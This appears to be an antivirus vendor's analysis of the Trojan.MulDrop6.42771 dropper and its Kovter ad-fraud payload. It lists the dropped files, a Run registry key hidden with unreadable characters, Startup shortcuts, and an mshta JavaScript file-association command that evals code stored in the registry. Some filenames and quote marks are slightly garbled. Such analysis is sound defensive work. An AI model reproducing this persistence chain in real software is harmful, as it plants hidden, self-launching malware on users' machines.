SHA1:
- aef75ada634aa2b2447a3a6502645b74b1e9e018
A detection of the Trojan.MulDrop6.42771 dropper Trojan that uses Trojan.Kovter.118 as its payload. Trojan.Kovter can be labeled as an adware Trojan because it runs several windows of Microsoft Internet Explorer simultaneously, visits websites specified by virus makers and generates traffic for them by following advertising links and banners. Therefore, attackers make money on affiliate programs and advertisers.
It creates the following files at launching:
- C:\Users\<username>\AppData\Local\ea3e65
- C:\Users\<username>\AppData\Local\ea3e65\683149.2c1a69e
- C:\Users\<username>\AppData\Local\ea3e65\283804.bat
- C:\Users\<username>\AppData\Local\ea3e65\02962c.lnk
At that, the 02962c.lnk file refers to the C:\Users\<username>\AppData\Local\ea3e65\283804.bat BATCH file that contains the following line:
start "" "C:\Users\<username>\AppData\Local\ea3e65\683149.2c1a69e"Information about the INK file is recorded to the Windows system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"\0vhnwb" = "C:\Users\<username>\AppData\Local\ea3e65\02962c.lnk"Name of the entry contains unreadable characters—thus, it cannot be displayed by the regedit program.
Then it creates two more files:
- C:\Users\<username>\AppData\Roaming\01cd05\150b33.2c1a69e
- C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c652e1.lnk
The INK file refers to C:\Users\<username>\AppData\Roaming\01cd05\150b33.2c1a69e
The 683149.2c1a69e and 50b33.2c1a69e files contain random data but both of them are appended with the same extension and are used as triggers to launch Trojan.Kovter.
Finally, the Trojan creates file associations in the system registry:
[HKCR\.2c1a69e]
@=”bf1570\0”[HKCR\bf1570\shell\open\command]
@= 'mshta”javascript:qZ7sOhCI8q="EHHH";n7x=new ActiveXObject("WScript.Shell");DsJb4wGJs4="BtEe";j1ZSp8=n7x.RegRead("HKCU\\software\\isidaqnf\\amqoasyj");k7pfpsNfb="1beAz2j";eval(j1ZSp8);EHJ71gfGFX="2OxujZ1jpC";’